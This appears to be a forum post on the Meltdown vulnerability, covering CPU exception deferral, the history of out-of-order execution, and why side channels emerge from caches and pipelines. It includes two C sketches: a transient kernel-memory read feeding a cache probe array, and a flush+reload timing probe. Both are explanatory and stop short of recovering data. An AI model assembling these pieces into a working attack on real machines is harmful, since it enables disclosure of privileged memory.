Correct. Which is what makes Apple's disclosure especially interesting.
It seems like it's almost a coin-flip whether an architecture defers exception detection entirely to the retirement stage or not, and any number of factors could push things in one direction or the other.
Simply continuing with what already works, while more pressing matters in other areas were in flux, could mean that a decision set down before this could even have been a concern now takes on new significance.
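For concreteness, here's a minimal sketch (my own illustration, not anyone's actual PoC) of the access pattern at issue, assuming a core that defers the permission check to retirement. The kernel address is made up, it's x86/Linux-flavored, and on immune or patched hardware the dependent access leaves no usable footprint; the point is just the shape of the sequence.

```c
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>

static sigjmp_buf recover;
static volatile uint8_t probe[256 * 4096];  /* one page per possible byte value */

static void on_segv(int sig) {
    (void)sig;
    siglongjmp(recover, 1);  /* the architectural fault still arrives */
}

int main(void) {
    /* Hypothetical privileged address; purely illustrative. */
    volatile const uint8_t *kernel_ptr =
        (volatile const uint8_t *)0xffff800000000000ULL;

    signal(SIGSEGV, on_segv);

    if (sigsetjmp(recover, 1) == 0) {
        /* Architecturally this load is forbidden and must fault.  If the
         * permission check is deferred to retirement, the loaded value can
         * transiently feed the dependent access below before the fault
         * squashes the pipeline. */
        uint8_t secret = *kernel_ptr;
        (void)probe[secret * 4096];  /* cache footprint indexed by the value */
    }

    /* A real attack would now time accesses to each probe page to see which
     * line became cached; nothing is actually recovered here. */
    puts("transient window closed");
    return 0;
}
```

All the deferral buys an attacker is that narrow window between the forbidden load executing and the fault actually being taken; a core that checks permissions before forwarding the value simply never opens it.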
The rough model used to explain the initial description of what became Meltdown cited Tomasulo's algorithm as an explanatory device: an OoOE method that was built into the IBM System/360 Model 91, a machine with no caches.
For context, that machine was a close contemporary of the Model 85, which is credited with having the first cache of any kind, and it arrived a little before paged virtual memory was considered proven technology.
I'm not sure what sort of validation people are asserting was skipped, particularly if it turns out that a notable subset of high-performance architectures have some avenue for Meltdown. If it's the sort of validation I'm thinking of, it would never have been caught, because what we're seeing had, up until now, never been defined as incorrect.
A bunch of architectures likely fall into the basket of simply not being able to do the thing at all, which I'm not sure is all that laudable; much like how I am not good enough to even fail to keep control of a caught ball before being brought to the ground in the Super Bowl, and so shouldn't be praised over a receiver who almost had that reception.
The side-channel attack is a holistic threat that leverages the behaviors of multiple architectural features, many of those behaviors never considered part of the software-visible semantics of an architecture. A lot of blocks evolved to be agnostic to details best handled by someone else, in eras when no one could present a sane reason why a given predictor, cache, or pipeline should be de-tuned so as to lie about, or obfuscate, what it or something else was doing, especially not when these things were barely within human understanding to begin with.
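To make the cache part of that concrete, here's a small flush+reload-style timing probe, a sketch assuming x86 (clflush/rdtscp) and a made-up cycle threshold that would need calibration on real hardware. It only demonstrates that whether a line is cached is visible to ordinary timing, which is the read-back half of these attacks.

```c
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

#define CACHED_THRESHOLD 120  /* cycles; purely illustrative, needs calibration */

static uint8_t line[64];

/* Time a single access to addr in (approximate) core cycles. */
static uint64_t time_access(volatile const uint8_t *addr) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*addr;
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

int main(void) {
    volatile uint8_t *p = line;

    _mm_clflush(line);   /* evict the line: the next access should be slow */
    _mm_mfence();
    uint64_t cold = time_access(p);

    (void)*p;            /* touch it so it is resident in cache */
    _mm_mfence();
    uint64_t warm = time_access(p);

    printf("cold access: %llu cycles, warm access: %llu cycles\n",
           (unsigned long long)cold, (unsigned long long)warm);
    printf("warm access looks %s\n",
           warm < CACHED_THRESHOLD ? "cached" : "uncached (recalibrate threshold)");
    return 0;
}
```

None of the pieces involved (the cache, the timestamp counter, the flush instruction) is doing anything other than what it was designed to do; the leak only exists in the combination.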
Given the complexity of, and demands on, virtual memory (page-controlled permissions in particular) and TLBs, I think it's also the case that it hasn't always been clear which path was the right one.
Even now, I'm not sure that halting speculation under these conditions is the only way to go about it, or that doing so comes without cost.